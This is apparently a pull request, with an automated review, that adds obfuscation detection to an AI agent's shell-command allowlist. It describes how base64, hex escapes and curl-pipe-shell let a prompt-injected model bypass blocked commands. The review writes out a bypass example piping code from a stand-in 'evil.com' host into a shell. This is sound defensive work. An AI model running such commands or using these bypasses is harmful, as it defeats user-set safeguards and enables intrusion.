#16907: fix(security): detect obfuscated commands that bypass allowlist filters

## Summary - **Problem:** The exec tool's allowlist can be bypassed using shell obfuscation (base64 encoding, hex escapes, variable expansion, `curl | sh` piping) to execute blocked commands - **Why it matters:** A prompt-injected LLM can run arbitrary commands the user explicitly blocked - **What changed:** Added `detectCommandObfuscation()` as a pre-allowlist gate that detects obfuscation patterns and forces user approval - **What did NOT change:** Existing allowlist behavior is untouched — this only adds a new check before allowlist evaluation Closes #8592 ## Changes **`src/infra/exec-obfuscation-detect.ts`** (new): - Detection module with pattern matchers for base64, hex/octal, variable expansion, brace expansion, `curl | sh`, Unicode smuggling - Known-good installer exemptions (Homebrew, rustup, nvm, pnpm, bun) to avoid false positives **`src/agents/bash-tools.exec.ts`**: - Integrated `detectCommandObfuscation()` call before allowlist evaluation in both gateway and node execution paths **`src/infra/exec-obfuscation-detect.test.ts`** (new): - 33 unit tests covering all detection patterns, edge cases, and false positive suppression ## Security Impact - Command/tool execution surface changed? Yes — adds a detection gate before allowlist eval - Only adds restrictions, never loosens. False positives mitigated by known-good installer exemptions. ## Testing All 33 tests pass locally (macOS, Node.js v25.6.0). Covers: - Base64/hex/octal encoding bypass - Variable expansion (`$'cmd'`) - Curl-pipe-shell patterns - Multi-layer obfuscation - Known-good installer exemptions (no false positives) ## Compatibility Backward compatible — default behavior unchanged, only adds approval prompt for detected obfuscation. ## Failure Recovery Revert the single commit. Detection module is isolated — no other code depends on it except the two integration points in `bash-tools.exec.ts`. ## AI Disclosure AI-assisted (Claude via OpenClaw). All code reviewed, understood, and tested. <!-- greptile_comment --> <h3>Greptile Summary</h3> Adds a `detectCommandObfuscation()` pre-allowlist gate that detects common shell obfuscation patterns (base64 decode, hex escapes, `curl | sh`, eval with encoding, variable expansion, etc.) and forces user approval when triggered. The detection module is well-structured and the integration into both gateway and node execution paths in `bash-tools.exec.ts` is clean. - **Suppression piggybacking vulnerability**: The false-positive suppression regexes for known-good installers (rustup, nvm, Homebrew, etc.) match the known-good URL *anywhere* in the command string. An attacker can include a known-good URL alongside a malicious one (e.g., `curl https://sh.rustup.rs https://evil.com/bad.sh | sh`) to suppress `curl-pipe-shell` detection while still executing malicious content. - **Homebrew suppression test is vacuous**: The canonical Homebrew install command uses `$(curl ...)` command substitution, not a pipe. The `curl-pipe-shell` detection regex never matches it, so the suppression logic is never exercised. The test passes for the wrong reason. - Good test coverage overall with 33 tests covering detection patterns, edge cases, and false positive suppression. <h3>Confidence Score: 3/5</h3> - The PR adds a useful security layer but the suppression mechanism has a bypass that should be addressed before merge. - The core detection logic is sound and the integration is clean, but the false-positive suppression can be piggybacked by including a known-good URL alongside a malicious one, which undermines the security intent. The Homebrew suppression test also passes vacuously. These are addressable issues but warrant fixes before merging a security-focused change. - Pay close attention to `src/infra/exec-obfuscation-detect.ts` — the suppression regexes need tightening to prevent piggybacking attacks. _{Last reviewed commit: c86646d} <!-- greptile_other_comments_section --> <!-- /greptile_comment -->